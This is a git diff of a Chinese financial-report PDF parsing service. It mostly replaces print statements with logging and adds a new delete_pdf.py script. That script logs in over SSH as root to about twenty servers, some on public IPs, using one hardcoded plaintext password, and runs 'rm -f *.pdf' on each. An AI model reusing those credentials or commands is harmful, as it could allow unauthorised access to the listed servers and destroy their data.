        records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
        processes = []
@ -583,13 +622,27 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
            p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array, partition_name))
            processes.append(p)
            p.start()
    elif report_type == 2:
        start_time = time.time()
        cursor.execute(select_query_first_quarter)
        records = cursor.fetchall()
        end_time = time.time()
        logger.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
        logger.info(f'insert_table_measure_from_vector_async_process方法走的一季报')
        start_time = time.time()
        records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
        processes = []
        for record_range in records_range_parts:
            p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array,partition_name))
            processes.append(p)
            p.start()
    elif report_type == 3:
        start_time = time.time()
        cursor.execute(select_query_thrid)
        records = cursor.fetchall()
        end_time = time.time()
-        print(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
+        logger.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
-        print('insert_table_measure_from_vector_async_process方法走的三季报')
+        logger.info(f'insert_table_measure_from_vector_async_process方法走的三季报')
        start_time = time.time()
        records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
        processes = []
@ -603,8 +656,8 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
        cursor.execute(select_query)
        records = cursor.fetchall()
        end_time = time.time()
-        print(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
+        logger.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
-        print('insert_table_measure_from_vector_async_process方法走的全年报')
+        logger.info(f'insert_table_measure_from_vector_async_process方法走的全年报')
        start_time = time.time()
        records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
        processes = []
@ -613,13 +666,13 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
            processes.append(p)
            p.start()
-    print('等待所有子任务完成，任务ID:', file_id)
+    logger.info(f'等待所有子任务完成，任务ID:{file_id}' )
    for p in processes:
        p.join()
-    print('所有子任务完成，任务ID:', file_id)
+    logger.info(f'所有子任务完成，任务ID:{file_id}')
-    print('启动指标归一化任务ID:', file_id)
+    logger.info(f'启动指标归一化任务ID:{file_id}')
    end_time = time.time()
-    print(f"向量更新时间 {(end_time - start_time):.2f} 秒。")
+    logger.info(f"向量更新时间 {(end_time - start_time):.2f} 秒。")
 def insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_id,file_name):
    create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S") 
@ -646,7 +699,7 @@ def insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_
    cursor.execute(select_query)
    records = cursor.fetchall()
    end_time = time.time()
-    print(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
+    logger.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
    start_time = time.time()
@ -708,9 +761,9 @@ def insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_
                    cursor.execute(insert_query, data_to_insert)
                    conn.commit()
    except Exception as e:
-        print(e)
+        logger.info(e)
    end_time = time.time()
-    print(f"向量更新数据时间 {(end_time - start_time):.2f} 秒。")
+    logger.info(f"向量更新数据时间 {(end_time - start_time):.2f} 秒。")
    start_time = time.time()
@ -720,6 +773,7 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
            (file_id, page_num, content) 
            VALUES (%s, %s, %s)
            '''
    for table in table_info:
        try:
            data=[]
@ -730,6 +784,12 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
            measure_list = table['measure_list']
            for measure in measure_list:
                measure_name = measure['measure_name']
                # 需要跳过的一些指标
                black_list = ["营业总成本"]
                if any(black in measure_name for black in black_list):
                    continue
                measure_value = measure['measure_value'].replace("(", "").replace(")", "")
                measure_name = utils.get_clean_text(measure_name)
                measure_name = measure_name.replace('2023','2023年').replace('2022','2022年').replace('（','').replace('）','')#这个真绝了，怎么都删不掉
@ -745,7 +805,9 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
                measure_name_1 = measure_name.replace('调整后','').replace('上年期末数','上年期末').replace('上年期末','上年年末')
                measure_unit = measure['measure_unit']
                if re.match(r'^[+-]?(\d+(\.\d*)?|\.\d+)(%?)$', measure_value) and any(key_word in measure_name for key_word in measure_name_keywords):
                    vector_obj = utils.embed_with_str(measure_name_1)
                    vector = vector_obj.output["embeddings"][0]["embedding"]
                    measure_data = {}
                    measure_data['vector'] = vector
@ -800,18 +862,18 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
                data=data,
                partition_name=partition_name
            )
            logger.info(f"向量插入结束")
        except Exception as e:
-            print(e)
+            logger.info(e)
 def runing_job():
    conn = mysql.connector.connect(
-        host= MYSQL_HOST,
+        host = MYSQL_HOST,
-        user= MYSQL_USER,
+        user = MYSQL_USER,
-        password= MYSQL_PASSWORD,
+        password = MYSQL_PASSWORD,
-        database= MYSQL_DB
+        database = MYSQL_DB
    )
    # 创建一个cursor对象来执行SQL语句
    cursor = conn.cursor(buffered=True)
    select_query = '''
@ -856,7 +918,8 @@ def delete_database(conn,cursor,file_id):
            cursor.execute(truncate,(file_id,))
        conn.commit()
    except Exception as e:
-        print(f'删除失败,原因是{e}')
+        logger.info(f'删除失败,原因是{e}')
 def delete_to_run(conn,cursor,file_id):
    try:
        truncate_query = [
@ -875,23 +938,23 @@ def delete_to_run(conn,cursor,file_id):
            cursor.execute(truncate,(file_id,))
        conn.commit()
    except Exception as e:
-        print(f'删除失败,原因是{e}')
+        logger.info(f'删除失败,原因是{e}')
 def insert_pdf_text_info(table_info,conn,cursor):
    # 执行SQL语句，插入数据
    insert_query = '''
                INSERT INTO pdf_text_info
                (file_id, page_num, text) 
                VALUES (%s, %s, %s)
                '''
    file_id = table_info['file_id']
-    page_num = int(table_info['page_num'])
+    page_num = table_info['page_num']
    text = table_info['text']
    data_to_insert = (file_id, page_num, text)
    cursor.execute(insert_query, data_to_insert)
    conn.commit()
 def process_time(file_id,type,time,start_time,end_time):
    conn = mysql.connector.connect(
        host= MYSQL_HOST,
@ -911,6 +974,7 @@ def process_time(file_id,type,time,start_time,end_time):
    data_insert = (file_id,type,time,start_time,end_time)
    cursor.execute(insert_query,data_insert)
    conn.commit()
 def batch_insert_page_text_nocheck(table_info, conn, cursor):
    file_id = table_info['file_id']
    page_num = int(table_info['page_num'])
@ -923,6 +987,7 @@ def batch_insert_page_text_nocheck(table_info, conn, cursor):
    data_to_insert = [(file_id, page_num, text) for text in text_lines]
    cursor.executemany(insert_query, data_to_insert)
    conn.commit()
 def batch_insert_page_text(table_info, conn, cursor):
    file_id = table_info['file_id']
    page_num = int(table_info['page_num'])
@ -945,6 +1010,7 @@ def batch_insert_page_text(table_info, conn, cursor):
    else:
        pass 
    conn.commit()
 def file_type_check(file_id):
    conn = mysql.connector.connect(
        host= MYSQL_HOST,
@ -965,6 +1031,7 @@ def file_type_check(file_id):
    finally:
        cursor.close()
        conn.close()
 def file_type_check_v2(file_id):
    conn = mysql.connector.connect(
        host= MYSQL_HOST,
@ -989,10 +1056,10 @@ def file_type_check_v2(file_id):
 def pdf_title_insert_mysql(file_id,title_array):
    conn = mysql.connector.connect(
-        host= MYSQL_HOST,
+        host = MYSQL_HOST,
-        user= MYSQL_USER,
+        user = MYSQL_USER,
-        password= MYSQL_PASSWORD,
+        password = MYSQL_PASSWORD,
-        database= MYSQL_DB
+        database = MYSQL_DB
    )
    cursor = conn.cursor(buffered=True)
    for item in title_array:
@ -1003,13 +1070,12 @@ def pdf_title_insert_mysql(file_id,title_array):
    cursor.close()
    conn.close()
 def get_file_info_from_mysql(file_id):
    conn = mysql.connector.connect(
-        host= MYSQL_HOST,
+        host = MYSQL_HOST,
-        user= MYSQL_USER,
+        user = MYSQL_USER,
-        password= MYSQL_PASSWORD,
+        password = MYSQL_PASSWORD,
-        database= MYSQL_DB
+        database = MYSQL_DB
    )
    #cursor = conn.cursor(buffered=True)
    cursor = conn.cursor(dictionary=True)  
--- a/zzb_data_prod/delete_pdf.py
+++ b/zzb_data_prod/delete_pdf.py
@ -0,0 +1,84 @@
 #报错提示
 import paramiko
 import time
 import threading
 # 执行命令的函数
 def execute_commands_on_server(hostname, username, password, host):
    try:
        # 连接到服务器
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(hostname=hostname, username=username, password=password)
        # 执行命令
        shell = client.invoke_shell()
        #启动docker
        shell.send("cd /root/pdf_parser/pdf\n")
        time.sleep(1)
        shell.send("rm -f *.pdf\n")
        time.sleep(10)
        shell.send("rm -f *.PDF\n")
        time.sleep(10)
        # 读取输出
        output = shell.recv(2048).decode()
        print(f"Output from {hostname}:\n{output}")
    except paramiko.SSHException as e:
        print(f"SSH connection error with {hostname}: {e}")
    finally:
        client.close()
 # 创建线程函数
 def thread_function(server):
    execute_commands_on_server(server['hostname'], server['username'], server['password'], server['host'])
 # 服务器列表
 # servers = [
 #     {'hostname': 'server1.example.com', 'username': 'user1', 'password': 'pass1', 'host': 'host1'},
 #     {'hostname': 'server2.example.com', 'username': 'user2', 'password': 'pass2', 'host': 'host2'},
 #     # 添加更多服务器
 # ]
 servers = [
    #{'hostname': '124.70.129.232', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'测试服务器'},
    # {'hostname': '1.94.179.121', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器'},#废弃
 #旧10台
    {'hostname': '113.44.72.157', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器1'},
    {'hostname': '1.94.101.237', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器2'},
    {'hostname': '123.60.16.225', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器3'},
    {'hostname': '124.71.157.162', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器4'},
    {'hostname': '1.94.60.103', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器5'},
    {'hostname': '1.94.143.23', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器6'},#都往这里存
    {'hostname': '124.71.149.225', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器7'},
    {'hostname': '113.44.52.221', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器8'},
    {'hostname': '121.37.137.13', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器9'},
    {'hostname': '123.60.28.83', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器10'},
 #新10台
    {'hostname': '192.168.0.19', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器1'},
    {'hostname': '192.168.0.53', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器2'},
    {'hostname': '192.168.0.150', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器3'},
    {'hostname': '192.168.0.210', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器4'},
    {'hostname': '192.168.0.129', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器5'},
    {'hostname': '192.168.0.24', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器6'},
    {'hostname': '192.168.0.250', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器7'},
    {'hostname': '192.168.0.162', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器8'},
    {'hostname': '192.168.0.86', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器9'},
    {'hostname': '192.168.0.88', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器10'},
 ]
 # 创建并启动线程
 threads = []
 for server in servers:
    thread = threading.Thread(target=thread_function, args=(server,))
    threads.append(thread)
    thread.start()
 # 等待所有线程完成
 for thread in threads:
    thread.join()
 print("All commands executed.")
--- a/zzb_data_prod/insert_redis.py
+++ b/zzb_data_prod/insert_redis.py
@ -0,0 +1,246 @@
 import pandas as pd
 import mysql.connector
 import utils
 #from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
 import re
 import redis
 def process_excel_and_db(input_excel_path1, input_excel_path2, output_file_path):
    # 读取第一个 Excel 文件
    df = pd.read_excel(input_excel_path1, sheet_name='Sheet2', header=0)#对应ttt表
    # 将 DataFrame 转换为字典列表
    data_list = df.to_dict(orient='records')
    # 连接到 MySQL 数据库
    conn = mysql.connector.connect(
        host=MYSQL_HOST,
        user=MYSQL_USER,
        password=MYSQL_PASSWORD,
        database=MYSQL_DB
    )
    cursor = conn.cursor()
    # 插入数据到 measure_create_config 表
    insert_query = '''
        INSERT INTO measure_create_config
        (config_id, meta_measure, same_mean_measure, measure_period, change_type, black_list) 
        VALUES (%s, %s, %s, %s, %s, %s)
    '''
    for data in data_list:
        show_measure = str(data['指标'])
        same_mean_measure = str(data['同义表述'])
        period_measure = str(data['周期'])
        change_measure = str(data['变动'])
        black_list = str(data['黑名单词'])
        config_id = utils.get_md5(show_measure)
        insert_query_data = (config_id, show_measure, same_mean_measure, period_measure, change_measure, black_list)
        cursor.execute(insert_query, insert_query_data)
        conn.commit()
    # 读取第二个 Excel 文件
    df_period = pd.read_excel(input_excel_path2, sheet_name='Sheet2', header=0)#对应周期表
    # 将 DataFrame 转换为字典列表
    period_list = df_period.to_dict(orient='records')
    # 插入数据到 measure_create_period 表
    period_insert_query = '''
        INSERT INTO measure_create_period
        (period_name, same_mean_period) 
        VALUES (%s, %s)
    '''
    for data in period_list:
        period_name = str(data['标准表述'])
        same_mean_period = str(data['同义表述'])
        insert_query_data = (period_name, same_mean_period)
        cursor.execute(period_insert_query, insert_query_data)
        conn.commit()
    # 查询数据库
    data_query = '''
        SELECT * FROM measure_create_config WHERE delete_status = 0
    '''
    period_query = '''
        SELECT * FROM measure_create_period
    '''
    cursor.execute(data_query)
    data_list = cursor.fetchall()
    cursor.execute(period_query)
    period_list = cursor.fetchall()
    # 输出到文件
    with open(output_file_path, 'w', encoding='utf-8') as file:
        for data in data_list:
            config_id = data[0]
            show_measure = data[1]
            same_mean_measure = data[2]
            period_measure = data[3]
            change_measure = data[4]
            same_mean_measure_arr = []
            period_measure_arr = []
            change_measure_arr = []
            if same_mean_measure != 'nan':
                same_mean_measure_arr = same_mean_measure.split(',')
                same_mean_measure_arr.append(show_measure)
            if period_measure != 'nan':
                period_measure_arr = period_measure.split(',')
            if change_measure != 'nan':
                change_measure_arr = change_measure.split(',')
            for c in change_measure_arr:
                period_measure_arr.append(c)
            for x in period_measure_arr:
                if x in change_measure_arr:
                    show_name = show_measure + x
                else:
                    show_name = x + show_measure
                for y in same_mean_measure_arr:
                    if x in change_measure:
                        parser_name = y + x
                    else:
                        parser_name = x + y
                    file.write(f'{show_name},{parser_name}\n')
                    for p in period_list:
                        period_exra_name = p[0]
                        period_exra_value = p[1]
                        if period_exra_name in x:
                            for v in period_exra_value.split(','):
                                if x in change_measure:
                                    parser_name = y + x.replace(period_exra_name, v)
                                else:
                                    parser_name = x.replace(period_exra_name, v) + y
                                file.write(f'{show_name},{parser_name}\n')
    cursor.close()
    conn.close()
 # 根据老指标配置表生成新指标配置表
 def create_new_config(conn, cursor, table_name,old_year,new_year):
    select_query = f'''
                SELECT measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance,year
                FROM {table_name}
                WHERE year = '{old_year}'
                '''
    cursor.execute(select_query)
    data_list = cursor.fetchall()
    insert_query = f'''
                INSERT INTO {table_name} 
                (measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance, year) 
                VALUES (%s, %s, %s, %s, %s, %s, %s, %s)
                '''
    for data in data_list:
        ori_measure_name = data[3]
        if re.match(r'^\d{4}',ori_measure_name):
            year = int(re.match(r'^\d{4}',ori_measure_name).group(0))
            year += 1
            ori_measure_name = str(year) + ori_measure_name[4:]
        insert_data = (data[0],data[1],data[2],ori_measure_name,data[4],data[5],data[6],new_year)
        cursor.execute(insert_query, insert_data)
    conn.commit()
 def measure_config_to_db(conn, cursor, table_name):
    year_list = ["2021","2022","2023","2024","2025"]
    for year in year_list:
        insert_query = f'''
                    INSERT INTO {table_name}
                    (measure_id, measure_name, ori_measure_id, ori_measure_name,delete_status,distance,year) 
                    VALUES (%s, %s, %s, %s,%s,%s,%s)
                    '''
        check_query = f'''
                    SELECT ori_measure_id FROM {table_name} 
                    WHERE year = '{year}'
                    '''
        # 新增指标
        lines = [
                f"当期营业收入,{year}年第一季度营业收入",
                f"当期归母净利润,{year}年第一季度归母净利润",
                f"当期扣非净利润,{year}年第一季度扣非净利润",
                f"当期经营活动现金流净额,{year}年第一季度经营活动现金流净额",
                f"当期筹资活动现金流净额,{year}年第一季度筹资活动现金流净额",
                f"当期投资活动现金流净额,{year}年第一季度投资活动现金流净额",
                f"当期非经常性损益,{year}年第一季度非经常性损益",
                f"当期基本每股收益,{year}年第一季度基本每股收益",
                f"当期稀释每股收益,{year}年第一季度稀释每股收益",
                f"当期加权平均净资产收益率,{year}年第一季度加权平均净资产收益率",
                f"当期扣非加权平均净资产收益率,{year}年第一季度扣非加权平均净资产收益率",
                f"当期营业成本 ,{year}年第一季度营业成本",
                f"当期销售费用,{year}年第一季度销售费用",
                f"当期管理费用,{year}年第一季度管理费用",
                f"当期财务费用,{year}年第一季度财务费用",
                f"当期研发费用,{year}年第一季度研发费用"]
        # 打印每一行
        for line in lines:
            config_list = line.strip().split(',')
            measure = config_list[0]
            ori_measure = config_list[1]
            ori_measure_id = utils.get_md5(ori_measure)
            # 判断数据库中是否有数据
            cursor.execute(check_query)
            check_records = cursor.fetchall()
            if any(record[0] == ori_measure_id for record in check_records):
                continue
            data_to_insert = (utils.get_md5(measure), measure, ori_measure_id, ori_measure,0,0.94,year)
            cursor.execute(insert_query, data_to_insert)
            conn.commit()
 def insert_measure_vector(conn,cursor,table_name):
    from config import REDIS_HOST,REDIS_PASSWORD,REDIS_PORT
    redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)# 192.168.0.172 #测试123.60.153.169
    # 执行SQL语句，更新数据
    select_query = f'''
                SELECT ori_measure_id,ori_measure_name FROM {table_name}
                '''
    cursor.execute(select_query)
    records = cursor.fetchall()
    print(f"总计{len(records)}条数据")
    for record in records:
        if redis_client.hexists('measure_config', record[0]):
            measure_vector = redis_client.hget('measure_config', record[0])
        else:
            print('新增指标',record[1])
            vector_obj = utils.embed_with_str(record[1])
            measure_vector = str(vector_obj.output["embeddings"][0]["embedding"])
        redis_client.hset('measure_config', record[0], measure_vector)
    redis_client.close()
    conn.close()
 #from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
 if __name__ == "__main__":
    #需要先清空本地数据库的  measure_create_config 和   measure_create_period   表
    # process_excel_and_db(
    #     'F:\\11_pdf\\ttt_1.xlsx',#ttt文件
    #     'F:\\11_pdf\\period_1.xlsx',#period文件
    #     'F:\\11_pdf\\out_2022_new_year.txt'#输出文件
    # )
    from config import MYSQL_HOST_APP, MYSQL_USER_APP, MYSQL_PASSWORD_APP, MYSQL_DB_APP
    conn = mysql.connector.connect(
        host=MYSQL_HOST_APP,
        user=MYSQL_USER_APP,
        password=MYSQL_PASSWORD_APP,
        database=MYSQL_DB_APP
    )
    cursor = conn.cursor()
    #file_path = r'F:\\11_pdf\\out_2022_new_year.txt'
    # 更新第一季度的measure_vector
    table_name = 'measure_config'
    # 写入mysql
    # measure_config_to_db(conn, cursor, table_name)
    create_new_config(conn, cursor, table_name,'2023','2024')
    # 插入redies
    insert_measure_vector(conn,cursor,table_name)
--- a/zzb_data_prod/log_config.py
+++ b/zzb_data_prod/log_config.py
@ -0,0 +1,51 @@
 import logging
 import os
 from logging.handlers import RotatingFileHandler
 def setup_logging():
    # 创建logs目录（如果不存在）
    log_dir = 'logs'
    if not os.path.exists(log_dir):
        os.makedirs(log_dir)
    # 配置根日志记录器
    root_logger = logging.getLogger()
    # 如果已经有handlers，先移除它们以防重复
    if root_logger.handlers:
        for handler in root_logger.handlers[:]:
            root_logger.removeHandler(handler)
    root_logger.setLevel(logging.INFO)
    # 创建格式化器
    formatter = logging.Formatter(
        '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
    )
    # 创建文件处理器
    file_handler = RotatingFileHandler(
        os.path.join(log_dir, 'app.log'),
        maxBytes=10*1024*1024,  # 10MB
        backupCount=5
    )
    file_handler.setLevel(logging.INFO)
    file_handler.setFormatter(formatter)
    # 创建控制台处理器
    console_handler = logging.StreamHandler()
    console_handler.setLevel(logging.INFO)
    console_handler.setFormatter(formatter)
    # 添加处理器到根日志记录器
    root_logger.addHandler(file_handler)
    root_logger.addHandler(console_handler)
    # 设置propagate=False以防止日志消息向上传播
    for logger_name in logging.root.manager.loggerDict:
        logger = logging.getLogger(logger_name)
        logger.propagate = False
    return root_logger
 logger = setup_logging()
--- a/zzb_data_prod/main.py
+++ b/zzb_data_prod/main.py
@ -22,8 +22,7 @@ from multiprocessing import Process
 from config import REDIS_HOST,REDIS_PORT,REDIS_PASSWORD
 import redis
 from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection,MilvusClient
-
+from log_config import logger
 '''
 已知发现问题：
@ -40,7 +39,7 @@ from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Colle
 STR_PATTERN = '营业收入|净利润|变动比例|损益|现金流量净额|现金净流量|现金流|每股收益|总资产|资产总额|收益率|货币资金|应收账款|存货|固定资产|在建工程|商誉|短期借款|应付账款|合同负债|长期借款|营业成本|销售费用|管理费用|财务费用|研发费用|研发投入|计入当期损益的政府补助'
-PATTERN = '品牌类型|分门店|销售渠道|行业名称|产品名称|地区名称|子公司名称|业绩快报|调整情况说明|调整年初资产负债表|主要子公司|分部|母公司资产负债表|显示服务|渠道|商品类型|合同分类|会计政策变更|地区分类|研发项目|分类产品|表头不合规的表格|内部控制评价|关联方|国内地区|国外地区|销售区域|存货库龄|外币|逾期60天以上|欧元|英镑|美元|日元'
+PATTERN = '品牌类型|分门店|销售渠道|行业名称|产品名称|地区名称|子公司名称|业绩快报|调整情况说明|调整年初资产负债表|主要子公司|分部|母公司资产负债表|显示服务|渠道|商品类型|合同分类|会计政策变更|地区分类|研发项目名称|分类产品|表头不合规的表格|内部控制评价|关联方|国内地区|国外地区|销售区域|存货库龄|外币|逾期60天以上|欧元|英镑|(?<=\d)美元|\美元(?=\d)|日元'
 MUILT_PATTERN = '调整前'
 #unit_pattern = re.compile(r'单位[：|:]?(百万元|千万元|亿元|万元|千元|元)')
 unit_pattern = re.compile(r'(单位|单元|人民币).{0,6}?(百万元|千万元|亿元|万元|千元|元).{0,3}?')#修改单位匹配规则，不限制冒号，只限制距离
@ -81,7 +80,7 @@ def safe_process_array(func, arr):
    try:
        return func(arr)
    except Exception as e:
-        print(f"这个函数出现了报错{func.__name__}: {e}")
+        logger.info(f"这个函数出现了报错{func.__name__}: {e}")
        return arr  # 返回原数组以便继续后续处理
 #单独针对三季报的资产负债表识别合并问题
@ -199,7 +198,7 @@ def process_array_with_grants(arr, keywords=['本报告期', '年初至报告期
 def get_table_range(file_path, file_id, pages, tables_range):
-    print('Run task %s (%s)...' % (f'解析表格{pages}', os.getpid()))
+    logger.info(f'Run task 解析表格--{pages} {os.getpid()}')
    start = time.time()
    conn = mysql.connector.connect(
@ -223,12 +222,26 @@ def get_table_range(file_path, file_id, pages, tables_range):
    try:
        tables = camelot.read_pdf(file_path, pages=pages, strip_text=',\n', copy_text=['v','h'],shift_text = ['l'])
        for t in tables:
            top = t._bbox[3]
            buttom = t._bbox[1]
            page_num = int(t.page)
            table_index = int(t.order)
            arr = np.array(t.data)
            if page_num != 0:
                # 表格数据写入
                line_texts = []
                for lines in t.data:
                    lines = list(set(lines))
                    for line in lines:
                        line_texts.append(line)
                db_service.batch_insert_page_text_nocheck({
                    'file_id': file_id,
                    'page_num' : page_num,
                    'text' : line_texts
                    },conn,cursor)
            arr = safe_process_array(process_array, arr)  #部分资产负债表合并问题
            arr = safe_process_array(process_array_with_annual_comparison, arr) #复杂表格的优化"多个上年同期时处理"
            arr = safe_process_array(process_array_with_grants, arr)  #三季报的非经常损益
@ -421,8 +434,14 @@ def get_table_range(file_path, file_id, pages, tables_range):
                    "data" : new_data,
                    'sort_num' : page_num*1000 - top
             }},conn_app,cursor_app)
    except Exception as e:
-        print(f'camelot解析表格时出现了{e}')
+        logger.info(f'camelot解析表格时出现了{e}')
    get_text_content(file_path, file_id, tables_range, pages, conn, cursor, redis_client, conn_app, cursor_app)
    cursor.close()
@ -432,7 +451,7 @@ def get_table_range(file_path, file_id, pages, tables_range):
    redis_client.close()
    end = time.time()
-    print('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
+    logger.info('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
 def text_in_table(top, tables_range, page_num):
    if tables_range.get(page_num):
@ -468,7 +487,7 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
    page_start = pages.split('-')[0]
    page_end = pages.split('-')[1]
-    print(f'pages的值为{pages}')
+    logger.info(f'pages的值为{pages}')
    select_year_select = f"""select report_type,year from report_check where id = {file_id}"""
    cursor.execute(select_year_select)
    record_select = cursor.fetchall()
@ -513,8 +532,8 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
                    line_text = re.sub(r"\s", "", line_text)
                    #提取符合要求的文本写入pdf_text_info，用于文本书写错误识别
-                    if not utils.pdf_text_flag(line_text):
+                    # if not utils.pdf_text_flag(line_text):
-                        line_texts.append(line_text)
+                    line_texts.append(line_text)
                        #db_service.insert_pdf_text_info({
                          #  'file_id': file_id,
                           # 'page_num' : pagenum+1,
@ -536,7 +555,7 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
                                    if text_type in ('page_header','page_footer'):
                                        break
                                    if pagenum ==44:
-                                        print(f'line_text在第44页的值有{line_text}')
+                                        logger.info(f'line_text在第44页的值有{line_text}')
                                    #这个对一整页都有用，会去掉很多正确的表
                                    # 记录需要过滤掉的页码
                                    if len(re.findall('母公司|现金流量表补充', line_text)) > 0 :
@ -546,10 +565,11 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
                                            'type': 'parent_com',
                                        },conn_app,cursor_app)
                                    # 保存每个表格上方小范围区域的文字，这部分内容包含了表格的标题和指标单位
                                    table_info = {}
                                    if utils.check_table_title_black_list(line_text,title_list):
                                                db_service.insert_measure_parser_info({
                                                    'file_id': file_id,
                                                    'content': f"{range['page_num']}_{range['table_index']}",
@ -613,6 +633,8 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
                        table_info = {}
                        # 记录需要过滤掉的页码
                        if len(re.findall('母公司|现金流量表补充', line_text)) > 0:
                            logger.info(f'line_text{line_text}')
                            logger.info(f'pagenum{pagenum}')
                            db_service.insert_measure_parser_info({
                                            'file_id': file_id,
                                            'content': pagenum+2,
@ -665,8 +687,8 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
                    'text' : line_texts
                    },conn,cursor)
        except Exception as e:
-            print(f'{pagenum}页处理异常')
+            logger.info(f'{pagenum}页处理异常')
-            print(e)
+            logger.info(e)
 def get_table_unit_info(file_id,line_text,page_num,table_index):
@ -725,7 +747,7 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
            uri=MILVUS_CLIENT,
        )
-        print('提取指标任务 %s (%s)...' % (record_range, os.getpid()))
+        logger.info('提取指标任务 %s (%s)...' % (record_range, os.getpid()))
        start = time.time()
        record_start = record_range.split('-')[0]
        record_end = record_range.split('-')[1]
@ -739,9 +761,7 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
                rows, cols = arr.shape
                if rows == 1 and cols == 1:
                    continue   
                row_num , col_num = -1 , -1        
                # 使用嵌套循环遍历数组，获取第一个数值位置
                for i in range(rows):
                    for j in range(cols):
@ -834,6 +854,8 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
                redis_client.incr(f'parsed_measure_count_{file_id}')
                if len(measure_list) > 0:
                    data_dict["measure_list"] = measure_list
                    data_dict["page_num"] = f"{str(t['page_num'])}_{str(t['table_index'])}"
@ -841,12 +863,12 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
                    measure_obj.append(data_dict)   
                    db_service.insert_measure_data_to_milvus(client,partition_name,measure_obj,cursor_app,conn_app)
            except Exception as e:
-                print(f"循环获取表格数据这里报错了,数据是{t['data']},位置在{index}")
+                logger.info(f"循环获取表格数据这里报错了,数据是{t['data']},位置在{index}")
-                print(f"错误是：{e}")
+                logger.info(f"错误是：{e}")
        end = time.time()
-        print('提取指标 %s runs %0.2f seconds.' % (record_range, (end - start)))
+        logger.info('提取指标 %s runs %0.2f seconds.' % (record_range, (end - start)))
    except Exception as e:
-        print(f'这个错误是{e},所在的位置是{record_start}-{record_end}')
+        logger.info(f'这个错误是{e},所在的位置是{record_start}-{record_end}')
        record_start = record_range.split('-')[0]
        record_end = record_range.split('-')[1]
        for index in range(int(record_start),int(record_end)):
@ -857,7 +879,7 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
            try:
                arr = np.array(t['data'])
            except Exception as e:
-                print(f'这个错误是{e}的arr的值是{arr}')
+                logger.info(f'这个错误是{e}的arr的值是{arr}')
    finally:
        redis_client.close()
        cursor.close()
@ -877,7 +899,7 @@ def dispatch_job(job_info):
            get_table_range(path, file_id, page_num, tables_range)
    except Exception as e:
-        print(e)
+        logger.info(e)
